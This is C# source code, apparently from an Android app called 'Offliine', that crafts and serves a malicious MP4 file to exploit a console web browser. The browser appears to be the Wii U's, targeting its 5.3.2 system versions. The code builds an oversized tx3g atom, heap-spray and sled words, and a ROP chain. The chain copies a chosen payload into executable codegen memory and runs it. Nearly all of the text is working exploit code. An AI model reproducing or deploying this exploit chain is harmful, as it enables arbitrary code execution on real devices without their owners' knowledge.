private static void _memcpy(int dest, int src, int size, SystemVersion version, OutputStream output) { try { _callFunction(version, version.Constants.Memcpy(), dest, src, size, 0, 0, output); } catch (Exception e) { Log.Debug("Offliine", e.Message); } }
private static void _osSwitchCodeGenMode(int mode, SystemVersion version, OutputStream output) { try { _callFunction(version, version.Constants.OsSwitchSecCodeGenMode(), mode, 0, 0, 0, 0, output); } catch (Exception e) { Log.Debug("Offliine", e.Message); } }
private static void _icInvalidateRange(int addr, int size, SystemVersion version, OutputStream output) { try { _callFunction(version, version.Constants.IcInvalidateRange(), addr, size, 0, 0, 0, output); } catch (Exception e) { Log.Debug("Offliine", e.Message); } }
private void _serveHax(SystemVersion version, Stream output, string payloadName) { var writer = new BufferedWriter(new OutputStreamWriter(output)); _writeHeader(writer, "video/mp4"); if (StageFright.Serve(new OutputStreamAdapter(output), version, payloadName)) { Log.Debug("Offliine", payloadName); } writer.Close(); }
private static void _copyCodebinToCodegen(int codegenAddr, int sourceAddr, int payloadSize, SystemVersion version, OutputStream output) { try { _osSwitchCodeGenMode(0, version, output); _memcpy(codegenAddr, sourceAddr, payloadSize, version, output); _osSwitchCodeGenMode(1, version, output); _dcFlushRange(codegenAddr, payloadSize, version, output); _icInvalidateRange(codegenAddr, payloadSize, version, output); } catch (Exception e) { Log.Debug("Offliine", e.Message); } }
private static void _callFunction(SystemVersion version, int function, int r3, int r4, int r5, int r6, int r28, OutputStream output) { try { _popr24Tor31(r6, r5, 0, version.Constants.Callr28PopR28ToR31(), function, r3, 0, r4, version, output); Util.WriteU32(version.Constants.Callfunc(), output); Util.WriteU32(r28, output); Util.WriteU32(0, output); Util.WriteU32(0, output); Util.WriteU32(0, output); Util.WriteU32(0, output); } catch (Exception e) { Log.Debug("Offliine", e.Message); } }
private void _serveWebPage(Stream output, SystemVersion version) { var writer = new OutputStreamWriter(output); HtmlHelper.BeginHtml(writer); HtmlHelper.BeginBody(writer); HtmlHelper.CreateHeader1(writer, "Offliine"); foreach (var payload in MainActivity.PayloadNames) { if (MainActivity.FoundPayloads[payload.Key].Contains(version.PayloadVersions[0] + ".bin")) { HtmlHelper.CreateButton(writer, payload.Key, payload.Value); } } HtmlHelper.EndBody(writer); HtmlHelper.EndHtml(writer); writer.Flush(); }
public static byte[] Generate(int heapAddr, SystemVersion version, int sourceAddr) { try { var payloadSize = 131072; var codegenAddr = 25165824; var output = new ByteArrayOutputStream(); _switchToCore1(version, output); _copyCodebinToCodegen(codegenAddr, sourceAddr, payloadSize, version, output); _popr24Tor31(version.Constants.OsFatal(), version.Constants.Exit(), version.Constants.OsDynLoadAcquire(), version.Constants.OsDynLoadFindExport(), version.Constants.OsSnprintf(), sourceAddr, 8, heapAddr, version, output); Util.WriteU32(codegenAddr, output); Util.WriteU32(0, output); _copyCodebinToCodegen(codegenAddr, sourceAddr, payloadSize, version, output); _popr24Tor31(version.Constants.OsFatal(), version.Constants.Exit(), version.Constants.OsDynLoadAcquire(), version.Constants.OsDynLoadFindExport(), version.Constants.OsSnprintf(), sourceAddr, 8, heapAddr, version, output); Util.WriteU32(codegenAddr, output); output.Close(); return(output.ToByteArray()); } catch (Exception e) { Log.Debug("Offliine", e.Message); } return(null); }
public static bool Serve(OutputStream output, SystemVersion version, string payloadName) { var tx3GSize = 32768; if ((version == SystemVersions.Eu532) || (version == SystemVersions.Us532) || (version == SystemVersions.Jp532)) { tx3GSize = 30720; } var tx3GRopStart = tx3GSize - 2048; var payloadSourceAddr = 341237032; var payloadStream = new ByteArrayOutputStream(); var ropChain = RopChain.Generate(payloadSourceAddr - 4096, version, payloadSourceAddr); Util.WriteU32(24, payloadStream); Util.WriteU32(1718909296, payloadStream); Util.WriteU32(862416950, payloadStream); Util.WriteU32(256, payloadStream); Util.WriteU32(1769172845, payloadStream); Util.WriteU32(862409526, payloadStream); Util.WriteU32(tx3GSize + 4096, payloadStream); Util.WriteU32(1836019574, payloadStream); Util.WriteU32(108, payloadStream); Util.WriteU32(1677721600, payloadStream); payloadStream.Write(Util.ToArray("00000000C95B811AC95B811AFA0002580000022D000100000100000000000000000000000000FFFFF1000000000000000000000000010000000000000000000000000000400000000000000000000000000015696F6473000000001007004FFFFF2803FF")); Util.WriteU32(tx3GSize + 2048, payloadStream); Util.WriteU32(1953653099, payloadStream); Util.WriteU32(92, payloadStream); Util.WriteU32(1953196132, payloadStream); payloadStream.Write(Util.ToArray("00000001C95B811AC95B811A00000001000000000000022D000000000000000000000000010000000001000000000000000800000000000000010000000000000000000000000000400000000000100000000000")); Util.WriteU32(tx3GSize, payloadStream); Util.WriteU32(1954034535, payloadStream); for (var i = 0; i < tx3GSize - 8; i += 4) { if (i < 24576) { if (i < 4096) { Util.WriteU32(1610612736, payloadStream); } else if (i < 20480) { var payload = Payload.Generate(version, payloadName); payloadStream.Write(payload); i += payload.Length - 4; if (i + 4 >= 24576) { return(false); } while (i + 4 < 20480) { Util.WriteU32(-1869574000, payloadStream); i += 4; } } else { Util.WriteU32(1482184792, payloadStream); } } else if (i < tx3GRopStart) { Util.WriteU32(version.Constants.PopjumplrStack12(), payloadStream); } else if (i == tx3GRopStart) { Util.WriteU32(version.Constants.PopjumplrStack12(), payloadStream); Util.WriteU32(1212696648, payloadStream); i += 8; payloadStream.Write(ropChain); i += ropChain.Length - 4; } else { Util.WriteU32(1212696648, payloadStream); } } Util.WriteU32(453, payloadStream); Util.WriteU32(1835297121, payloadStream); Util.WriteU32(1, payloadStream); Util.WriteU32(1954034535, payloadStream); Util.WriteU32(1, payloadStream); Util.WriteU32((int)(4294967296L - tx3GSize), payloadStream); for (var i = 0; i < 8192; i += 4) { Util.WriteU32(-2070567244, payloadStream); } var payloadBytes = payloadStream.ToByteArray(); output.Write(Encoding.ASCII.GetBytes(Integer.ToHexString(payloadBytes.Length) + "\r\n")); output.Write(payloadBytes); output.Write(Encoding.ASCII.GetBytes("\r\n0\r\n\r\n")); payloadStream.Close(); return(true); }